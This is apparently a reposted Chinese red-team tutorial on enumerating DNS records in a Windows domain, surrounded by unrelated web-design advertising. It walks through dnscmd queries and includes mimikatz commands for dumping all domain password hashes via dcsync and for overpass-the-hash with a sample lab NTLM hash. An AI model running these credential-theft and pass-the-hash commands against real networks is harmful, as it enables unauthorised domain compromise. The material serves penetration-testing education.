域渗透——DNS记录的获取

 0x00 前言

创新互联专注于中大型企业的做网站、网站设计和网站改版、网站营销服务，追求商业策划与数据分析、创意艺术与技术开发的融合，累计客户数千家，服务满意度达97%。帮助广大客户顺利对接上互联网浪潮，准确优选出符合自己需要的互联网运用，我们将一直专注成都品牌网站建设和互联网程序开发，在前进的路上，与客户一起成长！

在域渗透中，对域环境的信息搜集很关键，如果我们获得了域内管理员的权限，那么如何能够快速了解域内的网络架构呢?DNS记录无疑是一个很好的参考。

本文将要介绍在域渗透中，获取DNS记录的常用方法。

0x01 简介

本文将要介绍以下内容：

• 通过DNS Manager获取DNS记录
• 通过dnscmd获取DNS记录
• 域内远程读取DNS记录的方法

0x02 通过DNS Manager获取DNS记录

测试系统：

• Windows Server 2008 R2 x64

选择Administrative Tools -> DNS。

在Forward Lookup Zones下找到当前域名，能够显示当前域内的DNS记录，包括主机名和对应的IP。

如下图：

0x03 通过dnscmd获取DNS记录

dnscmd：

用来管理DNS服务器的命令行接口，支持远程连接。

默认安装的系统：

• Windows Server 2003
• Windows Server 2008
• Windows Server 2003 R2
• Windows Server 2008 R2
• Windows Server 2012
• Windows Server 2003 with SP1

...

参考资料：

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc772069(v=ws.11)

Win7系统在使用时需要安装Remote Server Administration Tools (RSAT)

参考地址：

https://support.microsoft.com/en-us/help/2693643/remote-server-administration-tools-rsat-for-windows-operating-systems

RSAT下载地址：

https://www.microsoft.com/en-us/download/details.aspx?id=7887

测试系统：

• · Windows Server 2008 R2 x64

常用命令:

(1)列出DNS区域中当前节点的资源记录：

 
 
 
 

  
  
  
  
Dnscmd . /EnumZones 
 
 
 
 

如下图：

(2)列出test.com的信息：

 
 
 
 

  
  
  
  
Dnscmd . /ZoneInfo test.com 
 
 
 
 

如下图：

(3)列举test.com中的记录，方法1(更详细)：

 
 
 
 

  
  
  
  
Dnscmd . /ZonePrint test.com 
 
 
 
 

如下图：

(4)列举testc.com的记录，方法2：

 
 
 
 

  
  
  
  
Dnscmd . /EnumRecords test.com . 
 
 
 
 

如下图：

结果同DNS Manager获取的记录一致。

0x04 域内远程读取DNS记录的方法

方法分析

前提需要获得域管理员的权限。

第一种方法是先远程连接域控制器，然后在域控制器上执行dnscmd获取DNS记录。

第二种方法是在域内一台主机上面，执行dnscmd远程读取DNS记录。

但是Win7系统默认不支持dnscmd，直接安装Remote Server Administration Tools (RSAT)也不现实。

于是，我尝试寻找在未安装Remote Server Administration Tools (RSAT)的系统上执行dnscmd的方法。

方法测试

向未安装Remote Server Administration Tools (RSAT)的Win7系统上复制一个dnscmd.exe，直接执行，结果失败。

解决方法

通过Process Monitor记录dnscmd的执行过程，查看缺少哪些文件。

如下图：

发现缺少文件dnscmd.exe.mui。

补全缺少的文件，再次测试，最终找到解决方法。

在未安装Remote Server Administration Tools (RSAT)的系统上执行dnscmd，需要满足以下条件：

1、dnscmd保存在路径C:\Windows\System32下

2、dnscmd.exe.mui保存在C:\Windows\System32\en-US下(该位置比较通用，也可以在其他位置)

注：dnscmd和dnscmd.exe.mui使用Windows Server 2008 R2下的即可。

这里提供一个测试文件(我从Windows Server 2008 R2下获得的)：

https://github.com/3gstudent/test/dnscmd.exe

https://github.com/3gstudent/test/dnscmd.exe.mui

注：

仅供测试。

由于dnscmd在远程连接时，未提供输入用户名和口令的接口，这里需要借助mimikatz的Overpass-the-hash。

首先需要获得域管理员用户的hash，这里只能用ntlm/rc4/aes128/aes256

如果获得了域管理员用户的明文口令，可以先将明文转为ntlm，在线加密的网站：

https://md5decrypt.net/en/Ntlm/

补充：使用dcsync获得域内所有用户hash的方法。

域控制器上执行mimikatz:

 
 
 
 

  
  
  
  
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit" 
 
 
 
 

实际测试

测试环境的参数如下：

• 域管理员用户：Administrator
• 口令：DomainAdmin456!
• hash：A55E0720F0041193632A58E007624B40

Overpass-the-hash:

 
 
 
 

  
  
  
  
mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40" 
 
 
 
 

这样会弹出一个cmd.exe

接着使用dnscmd远程连接进行查询：

 
 
 
 

  
  
  
  
Dnscmd WIN-F08C969D7FM.test.com /EnumZones 
 
 
 
 

or

 
 
 
 

  
  
  
  
Dnscmd WIN-F08C969D7FM /EnumZones 
 
 
 
 

注：这里要使用FQDN或者计算机名。

如下图：

如果想在命令行下实现整个流程，可以采用如下方法：

新建c:\test\1.bat，内容如下：

 
 
 
 

  
  
  
  
Dnscmd WIN-F08C969D7FM.test.com /EnumZones > c:\test\out.txt 
 
 
 
 

Overpass-the-hash:

 
 
 
 

  
  
  
  
mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:\"cmd.exe /c c:\test\1.bat\"" 
 
 
 
 

注：cmd.exe下"需要使用转义字符\"

0x05 小结

本文介绍了在域内使用Overpass-the-hash实现dnscmd远程读取DNS记录的方法。

网站栏目：域渗透——DNS记录的获取
链接URL：http://www.csdahua.cn/qtweb/news49/223449.html

网站建设、网络推广公司-快上网，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 快上网